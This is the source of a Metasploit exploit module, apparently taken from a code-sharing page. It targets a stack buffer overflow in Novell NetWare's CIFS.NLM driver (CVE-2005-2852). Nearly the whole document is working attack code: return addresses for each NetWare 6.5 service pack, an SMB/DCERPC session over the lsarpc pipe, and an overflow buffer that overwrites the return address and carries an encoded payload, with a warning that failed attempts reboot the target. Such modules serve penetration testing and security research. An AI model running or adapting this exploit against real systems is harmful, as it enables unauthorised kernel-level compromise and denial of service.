Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
16
      'Description'    => %q{
17
        This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
18
        Since the driver runs in the kernel space, a failed exploit attempt can
19
        cause the OS to reboot.
20
      },
21
      'Author'         =>
22
        [
23
          'toto',
24
        ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2005-2852' ],
29
          [ 'OSVDB', '12790' ]
30
        ],
31
      'Privileged'     => true,
32
      'Payload'        =>
33
        {
34
          'Space'    => 400,
35
          'BadChars' => "\x00",
36
        },
37
      'Platform'       => 'netware',
38
      'Targets'        =>
39
        [
40
          # NetWare SP can be found in the SNMP version :
41
          # 5.70.07 -> NetWare 6.5 (5.70) SP7 (07)
42

43
          [ 'VMware',   { 'Ret' => 0x000f142b } ],
44
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
45
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
46
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
47
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
48
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
49
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
50
        ],
51

52
      'DisclosureDate' => '2007-01-21'))
53

54
    register_options(
55
      [
56
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (LSARPC)", 'lsarpc'])
57
      ])
58

59
  end
60

61
  def exploit
62

63
    # Force multi-bind off (netware doesn't support it)
64
    datastore['DCERPC::fake_bind_multi'] = false
65

66
    connect()
67
    smb_login()
68

69
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
70

71
    print_status("Binding to #{handle} ...")
72
    dcerpc_bind(handle)
73
    print_status("Bound to #{handle} ...")
74

75
    stb =
76
      NDR.long(rand(0xffffffff)) +
77
      NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
78
      NDR.long(0) +
79
      NDR.long(0) +
80
      NDR.long(0) +
81
      NDR.long(0) +
82
      NDR.long(0) +
83
      NDR.long(0) +
84
      NDR.long(0x000f0fff)
85

86
    resp = dcerpc.call(0x2c, stb)
87
    handle, = resp[0,20]
88
    code, = resp[20, 4].unpack('V')
89

90
    name =
91
      rand_text_alphanumeric(0xa0) +
92
      [target.ret].pack('V') +
93
      payload.encoded
94

95
    stb =
96
      handle +
97
      NDR.long(1) +
98
      NDR.long(1) +
99

100
      NDR.short(name.length) +
101
      NDR.short(name.length) +
102
      NDR.long(rand(0xffffffff)) +
103

104
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +
105

106
      NDR.long(0) +
107
      NDR.long(0) +
108
      NDR.long(1) +
109
      NDR.long(0)
110

111
    print_status("Calling the vulnerable function ...")
112

113
    begin
114
      dcerpc.call(0x0E, stb)
115
    rescue
116
    end
117

118
    # Cleanup
119
    handler
120
    disconnect
121
  end
122
end
123

124